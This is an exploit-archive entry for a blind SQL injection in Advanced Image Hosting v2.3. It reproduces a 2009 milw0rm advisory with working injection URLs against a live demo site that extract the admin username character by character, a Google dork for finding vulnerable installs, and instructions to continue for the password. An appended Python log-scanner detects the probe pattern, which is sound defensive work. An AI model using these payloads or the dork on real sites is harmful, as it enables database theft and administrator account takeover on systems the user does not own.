Vendor: Advanced Image Hosting
By: boom3rang
CVSS: 7.5 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: Advanced Image Hosting
Affected Version From: v2.3
Affected Version To: v2.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:yabsoft:advanced_image_hosting
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Advanced Image Hosting (AIH) Remote Blind SQL Injection

Advanced Image Hosting (AIH) is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The PoC/Live Demo provided in the text shows how an attacker can use the Blind SQL Injection vulnerability to extract the username and password of the admin. The attacker can use the same technique to extract other sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.

Exploit-DB raw data:

###################################################################
Advanced Image Hosting (AIH) Remote Blind SQL Injection 
###################################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  Powered by: AIH v2.3
--------------------------------------------------
#[!] Product Name  :  Advanced Image Hosting    
#[!] Product Site  :  http://www.yabsoft.info
#[!] Version       :  v2.3
#[!] Download      :  http://yabsoft.com/aihs-feature.php
###################################################

[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++

First character of the username is char(100) -->  char="d"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++

Second character of the username is char(101) -->  char2="e"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++

Next character of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++

And the last character of the username is char(111) --> char4="o"
-------------
As we can see, the username is "demo". Now you can continue finding the other characters for the password, changing the character number: 5,6,7,8,9,10........


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2009-03-18]
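
Added example (not part of the original advisory or the vendor's code): a Python access-log check for the request pattern in the PoC above, where each request compares one character position of a subquery result through the gal parameter. The log format, sample lines, client addresses and the min_positions threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample: common-log-style lines; the probe requests copy the shape
# of the four PoC URLs above. Client addresses are documentation ranges.
HEAD = ("/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/"
        "concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1)")
LINE = '{ip} - - [18/Mar/2009:10:00:00 +0000] "GET {uri} HTTP/1.1" 200 5120'
SAMPLE_LOG = [LINE.format(ip="198.51.100.23", uri="/demo/aihspro/gallery_list.php?gal=3")]
SAMPLE_LOG += [LINE.format(ip="203.0.113.9", uri=f"{HEAD},{pos},1))>{val}--++")
               for pos, val in [(1, 100), (2, 101), (3, 109), (4, 111)]]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# ascii(substring(<subquery>, <position>, <length>)) <op> <value>
PROBE = re.compile(r"ascii\s*\(\s*substr(?:ing)?\s*\(.*,\s*(\d+)\s*,\s*\d+\s*\)\s*\)"
                   r"\s*[<>=]+\s*(\d+)", re.I | re.S)

def parse_probe(uri, param="gal"):
    """Return (position, compared_value) if `param` carries a boolean-blind probe."""
    for value in parse_qs(urlsplit(uri).query).get(param, []):
        # parse_qs already percent-decodes and maps '+' to space; comments used
        # as whitespace substitutes (/**/) are collapsed before matching.
        match = PROBE.search(SQL_COMMENT.sub(" ", value))
        if match:
            return int(match.group(1)), int(match.group(2))
    return None

def find_extraction_runs(lines, min_positions=3):
    """Map client -> sorted character positions probed, for clients that walk
    at least `min_positions` distinct positions (one request per character)."""
    seen = defaultdict(set)
    for line in lines:
        request = REQUEST.match(line)
        probe = parse_probe(request.group(2)) if request else None
        if probe:
            seen[request.group(1)].add(probe[0])
    return {ip: sorted(pos) for ip, pos in seen.items() if len(pos) >= min_positions}

if __name__ == "__main__":
    print(find_extraction_runs(SAMPLE_LOG))
```

A match is a heuristic signal for triage, not proof of compromise; a gallery id that is anything other than an integer is worth alerting on by itself.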